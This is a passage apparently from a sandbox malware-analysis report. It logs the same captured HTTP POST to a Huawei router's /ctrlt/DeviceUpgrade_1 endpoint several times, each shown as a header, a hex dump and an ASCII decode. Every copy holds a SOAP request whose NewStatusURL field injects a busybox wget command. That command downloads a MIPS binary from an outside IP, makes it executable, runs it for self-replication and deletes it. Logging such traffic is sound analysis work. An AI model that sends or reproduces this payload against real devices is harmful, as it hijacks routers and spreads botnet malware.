xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
